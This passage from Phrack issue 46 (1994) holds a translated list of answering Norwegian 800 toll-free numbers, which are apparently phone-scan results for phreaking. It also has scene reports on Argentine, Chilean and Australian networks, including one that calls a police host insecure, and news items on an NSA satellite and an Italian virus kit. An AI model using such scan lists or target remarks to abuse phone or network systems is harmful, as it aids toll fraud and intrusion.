80030073
|
|||
|
80030074
|
|||
|
80030075
|
|||
|
80030077
|
|||
|
80030080
|
|||
|
80030082
|
|||
|
80030088
|
|||
|
80030094
|
|||
|
80030096
|
|||
|
80030097
|
|||
|
80030098
|
|||
|
80030099
|
|||
|
80030100
|
|||
|
80030101
|
|||
|
80030102
|
|||
|
80030103
|
|||
|
80030105
|
|||
|
80030106
|
|||
|
80030110
|
|||
|
80030111
|
|||
|
80030113
|
|||
|
80030114
|
|||
|
80030116
|
|||
|
80030120
|
|||
|
80030131
|
|||
|
80030136
|
|||
|
80030140
|
|||
|
80030144
|
|||
|
80030151
|
|||
|
80030155
|
|||
|
80030160
|
|||
|
80030166
|
|||
|
80030170
|
|||
|
80030171
|
|||
|
80030175
|
|||
|
80030177
|
|||
|
80030189
|
|||
|
80030190
|
|||
|
80030195
|
|||
|
80030199
|
|||
|
80030200
|
|||
|
80030202
|
|||
|
80030203
|
|||
|
80030205
|
|||
|
80030210
|
|||
|
80030211
|
|||
|
80030212
|
|||
|
80030213
|
|||
|
80030215
|
|||
|
80030222
|
|||
|
80030227
|
|||
|
80030230
|
|||
|
80030233
|
|||
|
80030235
|
|||
|
80030239
|
|||
|
80030250
|
|||
|
80030255
|
|||
|
80030258
|
|||
|
80030260
|
|||
|
80030265
|
|||
|
80030270
|
|||
|
80030275
|
|||
|
80030277
|
|||
|
80030288
|
|||
|
80030290
|
|||
|
80030294
|
|||
|
80030295
|
|||
|
80030297
|
|||
|
80030299
|
|||
|
80030300
|
|||
|
80030302
|
|||
|
80030303
|
|||
|
80030305
|
|||
|
80030306
|
|||
|
80030308
|
|||
|
80030310
|
|||
|
80030311
|
|||
|
80030313
|
|||
|
80030315
|
|||
|
80030318
|
|||
|
80030319
|
|||
|
80030322
|
|||
|
80030323
|
|||
|
80030330
|
|||
|
80030333
|
|||
|
80030336
|
|||
|
80030337
|
|||
|
80030340
|
|||
|
80030344
|
|||
|
80030345
|
|||
|
80030355
|
|||
|
80030360
|
|||
|
80030363
|
|||
|
80030366
|
|||
|
80030377
|
|||
|
80030380
|
|||
|
80030388
|
|||
|
80030390
|
|||
|
80030395
|
|||
|
80030400
|
|||
|
80030401
|
|||
|
80030407
|
|||
|
80030408
|
|||
|
80030411
|
|||
|
80030415
|
|||
|
80030420
|
|||
|
80030422
|
|||
|
80030433
|
|||
|
80030440
|
|||
|
80030445
|
|||
|
80030450
|
|||
|
80030452
|
|||
|
80030466
|
|||
|
80030470
|
|||
|
80030472
|
|||
|
80030475
|
|||
|
80030480
|
|||
|
80030488
|
|||
|
80030490
|
|||
|
80030495
|
|||
|
80030500
|
|||
|
80030501
|
|||
|
80030502
|
|||
|
80030511
|
|||
|
80030520
|
|||
|
80030522
|
|||
|
80030531
|
|||
|
80030540
|
|||
|
80030545
|
|||
|
80030550
|
|||
|
80030555
|
|||
|
80030560
|
|||
|
80030565
|
|||
|
80030566
|
|||
|
80030570
|
|||
|
80030571
|
|||
|
80030580
|
|||
|
80030585
|
|||
|
80030600
|
|||
|
80030601
|
|||
|
80030603
|
|||
|
80030600
|
|||
|
80030601
|
|||
|
80030603
|
|||
|
80030610
|
|||
|
80030616
|
|||
|
88030640
|
|||
|
80030650
|
|||
|
80030666
|
|||
|
80030670
|
|||
|
80030680
|
|||
|
80030683
|
|||
|
80030690
|
|||
|
80030700
|
|||
|
80030701
|
|||
|
80030707
|
|||
|
80030725
|
|||
|
80030730
|
|||
|
80030750
|
|||
|
80030770
|
|||
|
80030777
|
|||
|
80030788
|
|||
|
80030800
|
|||
|
80030803
|
|||
|
80030811
|
|||
|
80030828
|
|||
|
80030830
|
|||
|
80030840
|
|||
|
80030844
|
|||
|
80030850
|
|||
|
80030855
|
|||
|
80030860
|
|||
|
80030866
|
|||
|
80030870
|
|||
|
80030875
|
|||
|
80030880
|
|||
|
80030888
|
|||
|
80030889
|
|||
|
80030890
|
|||
|
80030900
|
|||
|
80030906
|
|||
|
80030910
|
|||
|
80030911
|
|||
|
80030915
|
|||
|
80030920
|
|||
|
80030922
|
|||
|
80030930
|
|||
|
80030940
|
|||
|
80030950
|
|||
|
80030955
|
|||
|
80030959
|
|||
|
80030960
|
|||
|
80030975
|
|||
|
80030990
|
|||
|
80030994
|
|||
|
80031000
|
|||
|
80031001
|
|||
|
80031006
|
|||
|
80031007
|
|||
|
80031008
|
|||
|
80031010
|
|||
|
80031020
|
|||
|
80031030
|
|||
|
80031031
|
|||
|
80031043
|
|||
|
80031044
|
|||
|
80031048
|
|||
|
80031055
|
|||
|
80031058
|
|||
|
80031060
|
|||
|
80031064
|
|||
|
80031066
|
|||
|
80031070
|
|||
|
80031075
|
|||
|
80031080
|
|||
|
80031082
|
|||
|
80031085
|
|||
|
80031092
|
|||
|
80031097
|
|||
|
80031103
|
|||
|
80031108
|
|||
|
80031110
|
|||
|
80031111
|
|||
|
80031112
|
|||
|
80031113
|
|||
|
80031122
|
|||
|
80031123
|
|||
|
80031140
|
|||
|
80031144
|
|||
|
80031150
|
|||
|
80031151
|
|||
|
80031155
|
|||
|
80031160
|
|||
|
80031166
|
|||
|
80031180
|
|||
|
80031188
|
|||
|
80031200
|
|||
|
80031210
|
|||
|
80031211
|
|||
|
80031212
|
|||
|
80031220
|
|||
|
80031221
|
|||
|
80031229
|
|||
|
80031230
|
|||
|
80031231
|
|||
|
80031234
|
|||
|
80031240
|
|||
|
80031241
|
|||
|
80031244
|
|||
|
80031250
|
|||
|
80031255
|
|||
|
80031266
|
|||
|
80031288
|
|||
|
80031290
|
|||
|
80031300
|
|||
|
80031306
|
|||
|
80031310
|
|||
|
80031313
|
|||
|
80031318
|
|||
|
80031336
|
|||
|
80031340
|
|||
|
80031343
|
|||
|
80031344
|
|||
|
80031355
|
|||
|
80031360
|
|||
|
80031366
|
|||
|
80031400
|
|||
|
80031404
|
|||
|
80031410
|
|||
|
80031412
|
|||
|
80031420
|
|||
|
80031422
|
|||
|
80031430
|
|||
|
80031440
|
|||
|
80031441
|
|||
|
80031447
|
|||
|
80031455
|
|||
|
80031460
|
|||
|
80031466
|
|||
|
80031510
|
|||
|
80031535
|
|||
|
80031540
|
|||
|
80031545
|
|||
|
80031550
|
|||
|
80031560
|
|||
|
80031566
|
|||
|
80031570
|
|||
|
80031571
|
|||
|
80031580
|
|||
|
80031590
|
|||
|
80031600
|
|||
|
80031606
|
|||
|
80031610
|
|||
|
80031611
|
|||
|
80031620
|
|||
|
80031630
|
|||
|
80031631
|
|||
|
80031640
|
|||
|
80031660
|
|||
|
80031661
|
|||
|
80031680
|
|||
|
80031688
|
|||
|
80031690
|
|||
|
80031700
|
|||
|
80031701
|
|||
|
80031707
|
|||
|
80031713
|
|||
|
80031717
|
|||
|
80031740
|
|||
|
80031760
|
|||
|
80031777
|
|||
|
80031780
|
|||
|
80031800
|
|||
|
80031801
|
|||
|
80031809
|
|||
|
80031811
|
|||
|
80031820
|
|||
|
80031830
|
|||
|
80031831
|
|||
|
80031833
|
|||
|
80031840
|
|||
|
80031850
|
|||
|
80031851
|
|||
|
80031866
|
|||
|
80031880
|
|||
|
80031888
|
|||
|
80031900
|
|||
|
80031907
|
|||
|
80031919
|
|||
|
80031927
|
|||
|
80031937
|
|||
|
80031947
|
|||
|
80031957
|
|||
|
80031958
|
|||
|
80031959
|
|||
|
80031970
|
|||
|
80031994
|
|||
|
80031995
|
|||
|
80031999
|
|||
|
80032000
|
|||
|
80032001
|
|||
|
80032002
|
|||
|
80032005
|
|||
|
80032008
|
|||
|
80032011
|
|||
|
80032020
|
|||
|
80032032
|
|||
|
80032040
|
|||
|
80032062
|
|||
|
80032066
|
|||
|
80032080
|
|||
|
80032092
|
|||
|
80032101
|
|||
|
80032105
|
|||
|
80032113
|
|||
|
80032123
|
|||
|
80032130
|
|||
|
80032140
|
|||
|
80032144
|
|||
|
80032150
|
|||
|
80032152
|
|||
|
80032155
|
|||
|
80032166
|
|||
|
80032173
|
|||
|
80032176
|
|||
|
80032200
|
|||
|
80032202
|
|||
|
80032210
|
|||
|
80032212
|
|||
|
80032220
|
|||
|
80032222
|
|||
|
80032223
|
|||
|
80032225
|
|||
|
80032232
|
|||
|
80032255
|
|||
|
80032280
|
|||
|
80032320
|
|||
|
80032323
|
|||
|
80032325
|
|||
|
80032330
|
|||
|
80032332
|
|||
|
80032333
|
|||
|
80032350
|
|||
|
80032355
|
|||
|
80032383
|
|||
|
80032390
|
|||
|
80032399
|
|||
|
80032400
|
|||
|
80032412
|
|||
|
80032415
|
|||
|
80032420
|
|||
|
80032424
|
|||
|
80032425
|
|||
|
80032432
|
|||
|
80032444
|
|||
|
80032450
|
|||
|
80032455
|
|||
|
80032460
|
|||
|
80032466
|
|||
|
80032500
|
|||
|
80032511
|
|||
|
80032520
|
|||
|
80032525
|
|||
|
80032530
|
|||
|
80032540
|
|||
|
80032550
|
|||
|
80032555
|
|||
|
80032560
|
|||
|
80032565
|
|||
|
80032571
|
|||
|
80032578
|
|||
|
80032600
|
|||
|
80032639
|
|||
|
80032660
|
|||
|
80032666
|
|||
|
80032668
|
|||
|
80032680
|
|||
|
80032690
|
|||
|
80032750
|
|||
|
80032754
|
|||
|
80032808
|
|||
|
80032820
|
|||
|
80032832
|
|||
|
80032850
|
|||
|
80032875
|
|||
|
80032880
|
|||
|
80032899
|
|||
|
80032900
|
|||
|
80032907
|
|||
|
80032927
|
|||
|
80032987
|
|||
|
80032990
|
|||
|
80032997
|
|||
|
80033000
|
|||
|
80033003
|
|||
|
80033011
|
|||
|
80033013
|
|||
|
80033016
|
|||
|
80033300
|
|||
|
80033301
|
|||
|
80033302
|
|||
|
80033303
|
|||
|
80033304
|
|||
|
80033305
|
|||
|
80033306
|
|||
|
80033310
|
|||
|
80033311
|
|||
|
80033312
|
|||
|
80033313
|
|||
|
80033315
|
|||
|
80033317
|
|||
|
80033318
|
|||
|
80033320
|
|||
|
80033321
|
|||
|
80033322
|
|||
|
80033325
|
|||
|
80033330
|
|||
|
80033331
|
|||
|
80033332
|
|||
|
80033333
|
|||
|
80033334
|
|||
|
80033335
|
|||
|
80033341
|
|||
|
80033345
|
|||
|
80033350
|
|||
|
80033353
|
|||
|
80033355
|
|||
|
80033370
|
|||
|
80033372
|
|||
|
80033373
|
|||
|
80033377
|
|||
|
80033380
|
|||
|
80033383
|
|||
|
80033385
|
|||
|
80033394
|
|||
|
80033399
|
|||
|
80033410
|
|||
|
80033411
|
|||
|
80033420
|
|||
|
80033432
|
|||
|
80033433
|
|||
|
80033440
|
|||
|
80033444
|
|||
|
80033445
|
|||
|
80033448
|
|||
|
80033450
|
|||
|
80033455
|
|||
|
80033456
|
|||
|
80033460
|
|||
|
80033466
|
|||
|
80033477
|
|||
|
80033488
|
|||
|
80033499
|
|||
|
80033500
|
|||
|
80033505
|
|||
|
80033510
|
|||
|
80033515
|
|||
|
80033520
|
|||
|
80033535
|
|||
|
80033540
|
|||
|
80033550
|
|||
|
80033555
|
|||
|
80033566
|
|||
|
80033567
|
|||
|
80033570
|
|||
|
80033577
|
|||
|
80033585
|
|||
|
80033590
|
|||
|
80033600
|
|||
|
80033610
|
|||
|
80033611
|
|||
|
80033616
|
|||
|
80033622
|
|||
|
80033626
|
|||
|
80033630
|
|||
|
80033633
|
|||
|
80033644
|
|||
|
80033650
|
|||
|
80033655
|
|||
|
80033660
|
|||
|
80033666
|
|||
|
80033670
|
|||
|
80033678
|
|||
|
80033690
|
|||
|
80033711
|
|||
|
80033717
|
|||
|
80033730
|
|||
|
80033733
|
|||
|
80033740
|
|||
|
80033760
|
|||
|
80033770
|
|||
|
80033775
|
|||
|
80033777
|
|||
|
80033779
|
|||
|
80033780
|
|||
|
80033788
|
|||
|
80033800
|
|||
|
80033808
|
|||
|
80033810
|
|||
|
80033818
|
|||
|
80033820
|
|||
|
80033833
|
|||
|
80033838
|
|||
|
80033840
|
|||
|
80033844
|
|||
|
80033855
|
|||
|
80033856
|
|||
|
80033860
|
|||
|
80033866
|
|||
|
80033880
|
|||
|
80033888
|
|||
|
80033890
|
|||
|
80033899
|
|||
|
80033900
|
|||
|
80033920
|
|||
|
80033930
|
|||
|
80033933
|
|||
|
80033940
|
|||
|
80033950
|
|||
|
80033960
|
|||
|
80033970
|
|||
|
80033977
|
|||
|
80033980
|
|||
|
80033990
|
|||
|
80033994
|
|||
|
80033999
|
|||
|
80034000
|
|||
|
80034011
|
|||
|
80034020
|
|||
|
80034022
|
|||
|
80034024
|
|||
|
80034025
|
|||
|
80034030
|
|||
|
80034033
|
|||
|
80034034
|
|||
|
80034035
|
|||
|
80034040
|
|||
|
80034043
|
|||
|
80034044
|
|||
|
80034050
|
|||
|
80034055
|
|||
|
80034070
|
|||
|
80034077
|
|||
|
80034080
|
|||
|
80034088
|
|||
|
80034090
|
|||
|
80034100
|
|||
|
80034110
|
|||
|
80034111
|
|||
|
80034115
|
|||
|
80034123
|
|||
|
80034125
|
|||
|
80034134
|
|||
|
80034135
|
|||
|
80034140
|
|||
|
80034144
|
|||
|
80034150
|
|||
|
80034155
|
|||
|
80034160
|
|||
|
80034166
|
|||
|
80034170
|
|||
|
80034180
|
|||
|
80034210
|
|||
|
80034220
|
|||
|
80034222
|
|||
|
80034240
|
|||
|
80034250
|
|||
|
80034260
|
|||
|
80034266
|
|||
|
80034270
|
|||
|
80034880
|
|||
|
80034888
|
|||
|
80034889
|
|||
|
80034910
|
|||
|
80034966
|
|||
|
80034988
|
|||
|
80034999
|
|||
|
80035000
|
|||
|
|
|||
|
-- End of list of answering 800 3xxxx services ------------------------------
|
|||
|
|
|||
|
This file was brought to you in English by Codex/DBA, 26-Apr-1994. I didn't
|
|||
|
ask cyb3rF for permission to translate this document, but I hope he won't
|
|||
|
mind. I also understand that the document is of varied use to some people
|
|||
|
(those of you who can't dial in free to Norway (cc 47), don't bother), but I
|
|||
|
thought any information, however useful might be of some interrest to the
|
|||
|
English speaking crowd out there.
|
|||
|
|
|||
|
Re: cyb3rF, Sicko, BattleAng, Maelstrom, Uridium, Enigma, Golan, BadS, vale_
|
|||
|
and any other people I've forgotten to mention right now (flame me on
|
|||
|
#phreak, guys ;).
|
|||
|
|
|||
|
I'll be back in Norway in June.
|
|||
|
|
|||
|
Codex/DBA, 26-Apr-1994.
|
|||
|
-- "Men I haelvete gutar, vaent paa meg!!" ----------------------------------
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
More about the Argentine Internet scenery.
|
|||
|
|
|||
|
|
|||
|
It's difficult to add something to an already good article like Opii's one,
|
|||
|
but here is some info which may interest you besides what you already know:
|
|||
|
|
|||
|
* The local Net started as late as January 1989, when the National Commission
|
|||
|
for Atomic Power (CNEA) connected to the BITNET network. The three first
|
|||
|
nodes were: ARGCNE (an IBM 9370-60 mainframe), ARGCNEA1 (IBM/370 158),
|
|||
|
and ARGCNEA2 (Comparex 7/68), all running RSCS V1. Release3 for data comm.
|
|||
|
|
|||
|
The node ARGCNEA2 was (I think it still is) the main link in Argentina to
|
|||
|
Bitnet. Until late 1992, they still used a manual DIAL-UP LINK (!) to the
|
|||
|
Chilean node UCHCECVM (IBM 4341MO2) at the Chile's National University in
|
|||
|
Santiago city, connecting at 9600 bps to exchange mail. I'm not sure about
|
|||
|
if the Chilean link is still working, due to the existing new leased line
|
|||
|
connection of the government's foreign office.
|
|||
|
|
|||
|
In mid-1990, the national university of La Plata, joined ranks and also
|
|||
|
connected to the Bitnet network. The two nodes, CESPIVM1 and CESPIVM2
|
|||
|
(Running on IBM mainframes) also served as hosts to a VAX 11-780, and a
|
|||
|
experimental link to some computers in Uruguay's (country) national
|
|||
|
University.
|
|||
|
|
|||
|
Another different beast is what's called the RAN network (National Academic
|
|||
|
Network), which is nothing more than a UUCP network connecting a hundred
|
|||
|
different nodes through the country. Again, until mid-92 they used X.25
|
|||
|
ARPAC connections (!!EXPENSIVE!!) and manual Dial-up calls(!!) for the
|
|||
|
"international" connection into UUCO. More recently (two months ago), they
|
|||
|
have got their own 64kbps leased line to the US, which finally will let
|
|||
|
people around the world to mess and GET into our computers :-).
|
|||
|
|
|||
|
While the project was to connect to Maryland University (financed by the
|
|||
|
US National Science Foundation, they love us), I still don't know what's the
|
|||
|
host at the other side of the leased line.
|
|||
|
|
|||
|
Well, that's the end of the FACTS that I have... now some political opinions:
|
|||
|
Things are getting a *little* better, but I don't expect any improvements
|
|||
|
for "Joe average" user, since to make things work, we must get rid off the
|
|||
|
current LD and data monopoly of the two European private telcos that own us.
|
|||
|
Until 1999, they have the exclusive right to use and abuse the market of
|
|||
|
both voice and data transmissions, and no competition can enter without
|
|||
|
passing through their satellite links (and rates). Very nice for a government
|
|||
|
that is always speaking of "free markets".
|
|||
|
|
|||
|
Until we get AT&T and/or MCI competing for the market, we won't have affordable
|
|||
|
rates, and US companies like CIS, Delphi, etc. than could be doing BIG
|
|||
|
business NOW, will have to wait until late 1999, when the monopoly ends by
|
|||
|
law. (Or, BTW: or they can talk to Mr. Al Gore, so he can kick a little our
|
|||
|
beloved president to end the telcos ripoff).
|
|||
|
|
|||
|
Chileans, in contrast, have a lot better scene, with well-established direct
|
|||
|
internet links, an X.25 network with 9600bps access through the country, and
|
|||
|
even Gopher servers since a long time ago!.
|
|||
|
|
|||
|
Following is a quick and dirty list of Internet domains for both Chile and
|
|||
|
Argentina:
|
|||
|
|
|||
|
ARGENTINA:
|
|||
|
|
|||
|
ar.ar (unspecified)
|
|||
|
athea.ar (unspecified)
|
|||
|
atina.ar (united nations development programme, argentina) (RAN UUCP HOST)
|
|||
|
ba.ar (unspecified)
|
|||
|
cb.ar (unspecified)
|
|||
|
com.ar (unspecified)
|
|||
|
edu.ar (unspecified)
|
|||
|
gov.ar (government of argentina) <- give my regards to our corrupt gvt!
|
|||
|
mz.ar (unspecified)
|
|||
|
ncr.ar (national cash register corporation, argentina)
|
|||
|
nq.ar (unspecified)
|
|||
|
org.ar (centro de estudios de poblacion corrientes',)
|
|||
|
sld.ar (unspecified)
|
|||
|
subdomain.ar (unspecified)
|
|||
|
test.ar (unspecified)
|
|||
|
tf.ar (unspecified)
|
|||
|
tm.ar (unspecified)
|
|||
|
buenosaires.ncr.ar (national cash register corporation, buenos aires, arg)
|
|||
|
city.ar.us (unspecified)
|
|||
|
datage.com.ar (unspecified)
|
|||
|
guti.sld.ar (unspecified)
|
|||
|
secyt.gov.ar (unspecified)
|
|||
|
unisel.com.ar (unspecified)
|
|||
|
unlp.edu.ar (universidad nacional de la plata, argentina)
|
|||
|
|
|||
|
CHILE:
|
|||
|
|
|||
|
altos.cl (altos chile limiteda. el corregidor, santiago, chile)
|
|||
|
apple.cl (axis calderon, santiago, chile)
|
|||
|
ars.cl (ars innovandi (el arte de innovar), chile)
|
|||
|
bci.cl (unspecified)
|
|||
|
campus.cl (indae limiteda. area de computacion, manuel montt, chile)
|
|||
|
cepal.cl (comision economica para america latina (cepal) santiago, chile)
|
|||
|
conicyt.cl (unspecified) <-- Government education branch
|
|||
|
contag.cl (contagio avda. ricardo lyon, idencia, santiago, chile)
|
|||
|
cronus.cl (familia fuentealba olea, chile) <-- a family with their node!
|
|||
|
difusion.cl (editorial difusion, chile)
|
|||
|
eclac.cl (unspecified)
|
|||
|
epson.cl (epson, chile)
|
|||
|
eso.cl (european southern observatory la silla, la serena, chile)
|
|||
|
frutex.cl (frutexport lota, santiago, chile)
|
|||
|
fundch.cl (fundacion, chile)
|
|||
|
fwells.cl (fundacion wells claro solar, casilla, temuco, chile)
|
|||
|
gob.cl (unspecified) <--- CHILEAN GOVERNMENT! Send a note to Mr. Pinochet!
|
|||
|
ingenac.cl (ingenac pedor de valdivia, idencia, santiago, chile)
|
|||
|
lascar.cl (university of catolica, chile)
|
|||
|
mic.cl (las condes, santiago, chile)
|
|||
|
ncr.cl (national cash register corporation, chile)
|
|||
|
opta.cl (opta limiteda. las violetas, idencia, santiago, chile)
|
|||
|
orden.cl (orden huerfanos piso, fax, santiago, chile)
|
|||
|
placer.cl (placer dome) <--- WHAT IS THIZ??? "Pleasure dome?" !!!!!!!!!!
|
|||
|
puc.cl (catholic university of chile (universidad catolica de chile)
|
|||
|
rimpex.cl (rimpex chile pedro de valdivia, casilla, correo santiago, chile)
|
|||
|
safp.cl (superintendencia de administradoras de fondos de pensiones, chile)
|
|||
|
scharfs.cl (scharfstein, las condes, santiago, chile)
|
|||
|
sisteco.cl (sisteco, santiago, chile)
|
|||
|
sonda.cl (sonda digital teatinos, santiago, chile)
|
|||
|
tes.cl (d.c.c. sistemas, chile)
|
|||
|
uai.cl (unspecified)
|
|||
|
ubiobio.cl (unspecified)
|
|||
|
uchile.cl (universidad de chile)
|
|||
|
ucv.cl (unspecified)
|
|||
|
udec.cl (universidad de concepcion de ingenieria de sistemas,)
|
|||
|
unisys.cl (unisys, chile)
|
|||
|
unorte.cl (universidad del norte, antofagasta, chile)
|
|||
|
usach.cl (universidad de santiago de chile de ingenieria informatica,)
|
|||
|
uta.cl (universidad de tarapaca, arica, chile)
|
|||
|
utfsm.cl (universidad tecnica de electronica, valparaiso, chile)
|
|||
|
ac.cam.cl (unspecified)
|
|||
|
agr.puc.cl (agriculture department, catholic university of chile
|
|||
|
astro.puc.cl (catholic university of chile (pontificia universidad catolica
|
|||
|
bio.puc.cl (catholic university of chile santiago)
|
|||
|
cec.uchile.cl (universidad de chile)
|
|||
|
cfm.udec.cl (universidad de concepcion, concepcion, chile)
|
|||
|
dcc.uchile.cl (department o. de ciencias de la computacion)
|
|||
|
dfi.uchile.cl (universidad de chile)
|
|||
|
die.udec.cl (universidad de concepcion de ingenieria de sistemas)
|
|||
|
dii.uchile.cl (universidad de chile)
|
|||
|
dim.uchile.cl (universidad de chile)
|
|||
|
dis.udec.cl (universidad de concepcion, concepcion, chile)
|
|||
|
disca.utfsm.cl (universidad tecnica federico santa maria, chile)
|
|||
|
dpi.udec.cl (universidad de concepcion de ingenieria de sistemas)
|
|||
|
elo.utfsm.cl (universidad tecnica federico santa maria, )
|
|||
|
finanzas.fundch.cl (fundacion, chile)
|
|||
|
fis.utfsm.cl (universidad tecnica federico santa maria,)
|
|||
|
inf.utfsm.cl (universidad tecnica federico santa maria,)
|
|||
|
ing.puc.cl (engineering, catholic university of chile )
|
|||
|
mat.puc.cl (mathematics department, catholic university of chile
|
|||
|
mat.utfsm.cl (universidad tecnica federico santa maria,
|
|||
|
qui.puc.cl (catholic university of chile santiago)
|
|||
|
seci.uchile.cl (universidad de chile)
|
|||
|
soft.udec.cl (universidad de concepcion de ingenieria de sistemas,)
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
Australian Scene Report Part II
|
|||
|
by Data King
|
|||
|
-------------------------------
|
|||
|
|
|||
|
This is the sequel to the Australian scene report that appeared in Phrack
|
|||
|
Issue 45. There have been a few developments since I wrote that report which I
|
|||
|
think people may be interested in.
|
|||
|
|
|||
|
Old NEWS
|
|||
|
~~~~~~~~
|
|||
|
But first before I deal with what's new, I need to deal with something that's
|
|||
|
old. Shortly after Phrack 45 was published, I received a fakemail that
|
|||
|
basically threatened me and also made a lot of claims, I would like to take
|
|||
|
this opportunity to reply to the author of this letter.
|
|||
|
|
|||
|
First of all this person claims I have not been in the scene for ages, well
|
|||
|
if I am not in the scene that is news to me!
|
|||
|
|
|||
|
The letter contained several threats to do something like redirect my
|
|||
|
telephone number to a 0055 number, for people outside of Australia, a 0055
|
|||
|
is a recorded timed call service.
|
|||
|
|
|||
|
To this I say: 'Go ahead, if your capable DO IT!'
|
|||
|
|
|||
|
I wont bother dealing with most of the rubbish contained in the article, it
|
|||
|
was just general BS.
|
|||
|
|
|||
|
Finally I have something to say directly to the person who wrote the mail:
|
|||
|
"If your so goddamn good, then don't hide behind fakemail, come out in the
|
|||
|
open and let us all fear you, come one get your lame ass on IRC and lets talk!"
|
|||
|
|
|||
|
Also I was told not to submit anything more to Phrack for publishing or bad
|
|||
|
things would happen, Well I guess either I have no phear, or I don't take
|
|||
|
these threats seriously.
|
|||
|
|
|||
|
|
|||
|
New NEWS
|
|||
|
~~~~~~~~
|
|||
|
AusCERT
|
|||
|
|
|||
|
Australia is forming it's own version of CERT, to be called AusCERT and
|
|||
|
based in Queensland, Australia. Everybody is shaking in their boots worrying
|
|||
|
- NOT!
|
|||
|
|
|||
|
Networks
|
|||
|
|
|||
|
In the last report you may remember I talked about the Australia Military
|
|||
|
Network in a very vague fashion, well now I have some more detailed info for
|
|||
|
you.
|
|||
|
|
|||
|
The Australian Defense Forces (ADF) have what they call "the Defense
|
|||
|
Integrated Secure Communications Network (DISCON)". This network is
|
|||
|
relatively new. Circuit switched operations only began in 1990. Packet
|
|||
|
switching came into effect during 1992.
|
|||
|
|
|||
|
It provides all the ADF's communication needs in terms of data, voice,
|
|||
|
video, and so on, secure and non secure communications.
|
|||
|
|
|||
|
Main control is exercised from Canberra (believed to be from within the DSD
|
|||
|
compound at Russell Offices), and the network is interconnected via a total
|
|||
|
of 11 ground stations across the country using Aussat.
|
|||
|
|
|||
|
Also the Australian Federal Police have an internet connection now.
|
|||
|
sentry.afp.gov.au is the main machine from what I can tell, from the looks
|
|||
|
of it, the machine is either a setup or they don't know much about security.
|
|||
|
|
|||
|
NeuroCon
|
|||
|
|
|||
|
There was a Con organized by The Pick held here in Melbourne a little while
|
|||
|
ago, from all reports it was a total disaster, once again showing the apathy
|
|||
|
of Australian people in the scene.
|
|||
|
|
|||
|
For Instance the organizers kept the location secret, and where supposed to
|
|||
|
pick people up in the city, at several allocated times they did not show up.
|
|||
|
|
|||
|
When one of the potential attendees rang and asked what was going on they
|
|||
|
were told by the organizers: "We are too drunk to come and get you".
|
|||
|
|
|||
|
Come on guys this is LAME, sure everyone likes a drink, but if you keep the
|
|||
|
location secret, make sure someone is able to go and get the people waiting
|
|||
|
to be picked up!
|
|||
|
|
|||
|
HackFEST 94
|
|||
|
|
|||
|
The Year is quickly approaching an end and as yet I have not managed to
|
|||
|
fully organize this event. I am in need of people who wish to speak on various
|
|||
|
topics, so if you are so inclined and have an idea, send me mail and we will
|
|||
|
see what we can organize.
|
|||
|
|
|||
|
As always I can be contacted at dking@suburbia.apana.org.au, but please note
|
|||
|
my PGP signature has changed, so please do a finger on the account if you want
|
|||
|
my new PGP signature.
|
|||
|
|
|||
|
Information in this article has come from various sources, but they shall
|
|||
|
remain nameless as they do not wish the attention of the AFP. They know who
|
|||
|
they are, and I send them my thanks - Thanks Guys!
|
|||
|
==Phrack Magazine==
|
|||
|
|
|||
|
Volume Five, Issue Forty-Six, File 28 of 28
|
|||
|
|
|||
|
PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
|
|||
|
PWN PWN
|
|||
|
PWN Phrack World News PWN
|
|||
|
PWN PWN
|
|||
|
PWN Compiled by Datastream Cowboy PWN
|
|||
|
PWN PWN
|
|||
|
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
|
|||
|
|
|||
|
Damn The Torpedoes June 6, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~
|
|||
|
by Loring Wirbel (Electronic Engineering Times) (Page 134)
|
|||
|
|
|||
|
On May 3, a gargantuan satellite was launched with little press coverage
|
|||
|
from Cape Canaveral.
|
|||
|
|
|||
|
The $1.5 billion satellite is a joint project of the NSA and the
|
|||
|
National Reconnaissance Office. At five tons, it is heavy enough to
|
|||
|
have required every bit of thrust its Titan IV launcher could
|
|||
|
provide--and despite the boost, it still did enough damage to the
|
|||
|
launch-pad water main to render the facility unusable for two months.
|
|||
|
|
|||
|
The satellite is known as Mentor, Jeroboam and Big Bertha, and it has an
|
|||
|
antenna larger than a football field to carry out "hyper-spectral
|
|||
|
analysis" -- Reconnaissance Office buzzwords for real-time analysis of
|
|||
|
communications in a very wide swath of the electromagnetic spectrum.
|
|||
|
|
|||
|
Clipper and Digital Signature Standard opponents should be paying
|
|||
|
attention to this one. Mentor surprised space analysts by moving into a
|
|||
|
geostationary rather than geosynchronous orbit. Geostationary orbit
|
|||
|
allows the satellite to "park" over a certain sector of the earth.
|
|||
|
|
|||
|
This first satellite in a planned series was heading for the Ural
|
|||
|
Mountains in Russia at last notice. Additional launches planned for
|
|||
|
late 1994 will park future Mentors over the western hemisphere.
|
|||
|
|
|||
|
According to John Pike of the Federation of American Scientists, those
|
|||
|
satellites will likely be controlled from Buckley Field (Aurora,
|
|||
|
Colorado), an NSA/Reconnaissance downlink base slated to become this
|
|||
|
hemisphere's largest intelligence base in the 1990s.
|
|||
|
|
|||
|
[Able to hear a bug fart from space. DC to Daylight realtime analysis.
|
|||
|
And you Clipper whiners cry about someone listening to your phone calls.
|
|||
|
Puh-lease.]
|
|||
|
|
|||
|
-----------------------------------------------------------------------------
|
|||
|
|
|||
|
Discovery of 'Data Processing Virus Factory' In Italy February 17, 1994
|
|||
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|||
|
AFP Sciences
|
|||
|
|
|||
|
It was learned in Rome on 10 February that a data processing virus
|
|||
|
"factory" -- in fact, a program called VCL (Viruses Creation Laboratory),
|
|||
|
capable of triggering a virus epidemic--was discovered in Italy
|
|||
|
|
|||
|
Mr. Fulvio Berghella, deputy directory-general of the Italian Institute
|
|||
|
for Bank Data Processing Security (ISTINFORM), discovered what it takes
|
|||
|
to enable just about anybody to fabricate data processing viruses; he told
|
|||
|
the press that its existence had been suspected for a year and a half and
|
|||
|
that about a hundred Italian enterprises had been "contaminated."
|
|||
|
|
|||
|
An investigation was launched to try to determine the origin of the program,
|
|||
|
said Mr. Alessandro Pansa, chief of the "data processing crime" section
|
|||
|
of the Italian police. Several copies of VCL were found in various places,
|
|||
|
particularly in Rome and Milan.
|
|||
|
|
|||
|
